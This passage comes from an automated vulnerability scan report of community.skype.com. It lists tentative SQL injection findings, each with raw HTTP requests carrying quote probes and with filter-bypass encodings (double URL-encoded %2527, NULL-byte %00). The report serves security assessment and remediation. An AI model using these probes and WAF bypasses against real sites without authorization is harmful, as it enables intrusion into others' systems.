Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Api-access-control-wont-remember/m-p/134242

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 188254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.14. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 253237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.15. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 182769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.16. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 246052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.17. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 9 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
<div class="exception-page-message IncorrectValueFormatException lia-component-content" class="exception-page-message IncorrectValueFormatException">
...[SNIP]...
<li>
           Sorry, your request failed. A notification has been sent to the development team for investigation.<p>
...[SNIP]...

Request 2

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> noptrix.net
...[SNIP]...

1.19. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...

1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/forums/recentpostspage/category-id/English/post-type/message?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id/English/post-type/message?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...

1.21. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/thread [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/thread

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/forums/recentpostspage/category-id'/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 115960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Topics -
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id''/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.22. http://community.skype.com/t5/forums/searchpage/tab/message [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 189840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...

1.23. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/advanced

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id%2527%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.24. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
